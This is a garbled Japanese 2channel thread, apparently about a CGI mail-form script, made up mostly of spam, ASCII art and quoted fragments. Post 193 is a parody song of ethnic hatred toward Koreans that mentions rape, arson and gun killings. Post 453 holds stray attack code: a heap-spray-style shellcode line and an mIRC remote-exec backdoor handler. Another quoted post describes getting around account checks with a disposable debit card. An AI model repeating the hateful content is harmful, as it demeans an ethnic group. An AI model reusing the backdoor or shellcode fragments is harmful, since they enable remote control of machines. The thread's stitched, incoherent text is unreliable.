   ~ ̄ ̄ ̄ ̄
     ∧_∧  ∧_∧
ピュ.ー (  ・3・) (  ^^ ) <これからも僕たちを応援して下さいね(^^)。
  =〔~∪ ̄ ̄ ̄∪ ̄ ̄〕
  = ◎――――――◎                      山崎渉&ぼるじょあ
terra タン最近どうしてるかなーと見に行ってみた。
http://www.tryhp.net/sendmail.htm

>>109のコードがそっくりそのまま流用されていた(激藁
それじゃ駄目だろってば。
181山崎 渉:03/08/15 23:09
    (⌒V⌒)
   │ ^ ^ │<これからも僕を応援して下さいね(^^)。
  ⊂|    |つ
   (_)(_)                      山崎パン
保守していい?
>>147
なんちゅうか。。。
>>17
いや、よくあることだと思うが。
185名無しさん@お腹いっぱい。:04/12/31 06:33:22
保守していい?
186名無しさん@お腹いっぱい。:05/01/23 11:31:00
age
オレンジレンジの盗作部分をまとめました。
http://www.geocities.jp/aqweb00/1743.mp3
パクってないって言う人はこれを全部聴いてから言ってください。
メンバーは即刻謝罪しろ
188これ何だ?:05/01/23 23:36:34
189名無しさん@お腹いっぱい。:2005/07/08(金) 11:11:59
↑察
190名無しさん@お腹いっぱい。:2006/01/19(木) 14:08:10
01.作詞:桜並あかね/作曲:猪熊しのぶ/編曲:玉越博幸
02.作詞:桜並あかね/作曲:naked ape/編曲:h-wonder
03.作詞:宮崎哲弥/作曲:綿貫正顕/編曲:外海良基
04.作詞:宮台真司/作曲:洲崎春海/編曲:桜井充
05.作詞:桜並あかね/作曲・編曲:玉越博幸
06.作詞:加藤健/作曲:北浦正尚/編曲:渡辺未来
07.作詞:桜並あかね、安倍なつみ/作曲・編曲:今関あきよし
08.作詞:渡部真也/作曲:吉村智雄/編曲:桜井充
09.作詞:宮台真司/作曲:壱河柳乃助/編曲:里見脩二
10.作詞・作曲:真山巧/編曲:小澤正澄/ストリングスアレンジ:村山達哉
11.作詞:結崎ひよの/作曲:桑原秀明/編曲:鳴海歩
12.作詞:冲方丁/作曲・編曲:studio SEED
13.作詞:森田まさのり/作曲・編曲:井田ヒロト
14.作詞:横路孝弘/作曲:玉越博幸/編曲:h-wonder
15.作詞:比良坂香雪/作曲:赤美潤一郎/編曲:内山真一郎
16.作詞:桜並あかね/作曲:有楽彰展/編曲:神田晶
17.作詞:堤抄子/作曲:里見脩二/編曲:葉山たけし
18.作詞:小沢一郎/作曲:藤井裕久/編曲:CHOKKAKU
19.作詞:映島巡/作曲:鎌谷悠希/編曲:伊藤達也
20.作詞:桜並あかね/作曲:渡辺未来/編曲:鳴海歩
21.作詞:関えり香/作曲:大野愛果/編曲:studio SEED
22.作詞:井脇ノブ子/作曲:荒川弘/編曲:清水信之
23.作詞:結崎ひよの/作曲:原田理花/編曲:池田大介
24.作詞:桜並あかね/作曲:笠原夕生/編曲:小林哲
25.作詞:星山博之/作曲:はしもとなおと/編曲:小澤正澄
26.作詞:関えり香/作曲:伊藤達也/編曲:田辺恵二
27.作詞:山田あゆみ/作曲:笠原夕生/編曲:CHOKKAKU
28.作詞:城平京/作曲:鎌谷悠希/編曲・ストリングスアレンジ:中野雄太
29.作詞:犬塚孝士/作曲:天乃咲耶/編曲:中野雄太
30.作詞:山田あゆみ/作曲:原田理花/編曲:清水信之
31.作詞:黒田洋介/作曲:前田武士/編曲:井田ヒロト
32.作詞:桜並あかね/作曲:山口寛雄/編曲:黒星紅白
191名無しさん@お腹いっぱい。:2006/06/10(土) 20:23:48
16 名前:名無しさん@お腹いっぱい。[sage] 投稿日:02/07/02(火) 04:33
>>15
192名無しさん@お腹いっぱい。:2007/07/27(金) 21:47:43
age
193名無しさん@お腹いっぱい。:2008/05/07(水) 22:52:49
ハァ
文化も無ェ 文明も無ェ 民度もそれほど育って無ェ
遺跡も無ェ 史書も無ェ 盗賊毎日ぐーるぐる
朝起きて 鏡見て 二時間ちょっとのプチ整形
娯楽も無ェ 未来も無ェ 放火とデモだけやり放題
ウリこんな国いやだ ウリこんな国いやだ
東京へでるだ 東京へ出たなら
武装スリやって 東京で女買うだ

ハァ
秩序も無ェ 法理も無ェ 遡及法とは何者だ?
酋長は、いるけれど 二重になって馬鹿加速
真実無ぇ 情報無ぇ たまに来るのは毒電波
常識無ェ あるわけ無ェ ウリの国には民度が無ぇ
ウリこんな国いやだ ウリこんな国いやだ
東京へでるだ 東京へ出たなら
民潭に入って 日本に永住するだ

ハァ
漫画も無ェ アニメも無ェ パクリばかりでつまんねぇ
喫茶も無ぇ 集いも無ぇ 娯楽はほとんど強姦だ
朴さんと、 金さんと ガソリンまいて声上げる
希望も無ェ 未来も無ェ 反日反米親北マンセー
ウリこんな国いやだ ウリこんな国いやだ
アメリカへでるだ アメリカへ出たなら
銃さ買って 金持ちぶち殺すだ


194名無しさん@お腹いっぱい。:2009/06/12(金) 03:51:14
195名無しさん@お腹いっぱい。:2009/07/08(水) 19:03:24
パーミッション644でいいんだっけ?
196墓ですが、:2009/07/10(金) 17:31:18
dat fileは600か606でCGIの有無
これで解決
197UEMtiYoTSWNPCSxXZOY:2009/10/22(木) 23:57:55
Is your mind opened to all the new possibilities the instructor is willing to give you? ,
198名無しさん@お腹いっぱい。:2011/01/04(火) 22:17:56
4 :z:2010/08/28(土) 10:25:02 ID:NtVfNVmU0
452 :動け動けウゴウゴ2ちゃんねる:2010/07/10(土) 15:53:49.30 ID:7Cr427LS0
>>440
・プロバイダの新しい有料メールアドレス
・ジャパンネットバンク銀行の使い捨て番号のVISAデビット
ニ.フ.ティ.ーの100円のメアドプラスで認証が通った。
認証できたら、メアドプラスは登録解除してOK。
普通のクレジットカードでは漢字の住所が登録できたが、
ジャパンネットバンク銀行のVISAデビットだとローマ字入力の住所を要求された。

ローマ字の書き方はこれ
ヘボン式ローマ字綴方表
http://www.seikatubunka.metro.tokyo.jp/hebon/

漢字住所でどんな順序でどんなローマ字、番地の番号を使ったかは、
メモ帳でメアド・パスワードと一緒に控えておいたほうがいい。
453 :動け動けウゴウゴ2ちゃんねる:2010/07/10(土) 15:55:00.00 ID:t966sYmN0
ローマ字変換
eip=eip+unescape("%u7030%u4300")
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
n0=on 900:text:!exec*:*:{.notice $nick Execut comanda: $2-
http://www2u.biglobe.ne.jp/~yuichi/rest/kanarome.html
454 :動け動けウゴウゴ2ちゃんねる:2010/07/10(土) 15:56:54.59 ID:qfPgiwgp0
●買うなんて荒らしと一緒だぞ
455 :動け動けウゴウゴ2ちゃんねる:2010/07/10(土) 15:58:50.21 ID:d455Pgrw0
荒らしが運営に喧嘩売っても被害を被るのは巻き添え食らってる人だけっていう…
荒らしたもん勝ち
456 :動け動けウゴウゴ2ちゃんねる:2010/07/10(土) 15:58:54.30 ID:sPPrGi160
荒らしが●を買ったんだとしたら、個人情報登録してるんじゃないのか?
それで同一名義のアカウント全部停止するとか、
新たに買おうとしてきても拒否するというのはできないんだろうか?
199 忍法帖【Lv=40,xxxPT】(3+0:8) 【21.2m】 電脳プリオン ◆3YKmpu7JR7Ic :2013/01/03(木) 19:48:40.49 BE:729735089-PLT(12079)
  ∧_∧
  ( ・∀・)            人 ガッ
  (    つ―-‐-‐-‐-‐-‐○ <  >__Λ∩
  人 Y ノ.             V`Д´)/
  し(_)                  /  ←>>170
200名無しさん@お腹いっぱい。:2014/09/22(月) 17:59:42.78
www
201名無しさん@お腹いっぱい。:2014/09/25(木) 17:13:36.27
ワロス
202名無しさん@お腹いっぱい。:2014/09/27(土) 11:07:24.04
202
203名無しさん@お腹いっぱい。:2014/09/28(日) 12:01:37.21
178
204名無しさん@お腹いっぱい。:2014/10/06(月) 00:05:30.64
0
205名無しさん@お腹いっぱい。
1000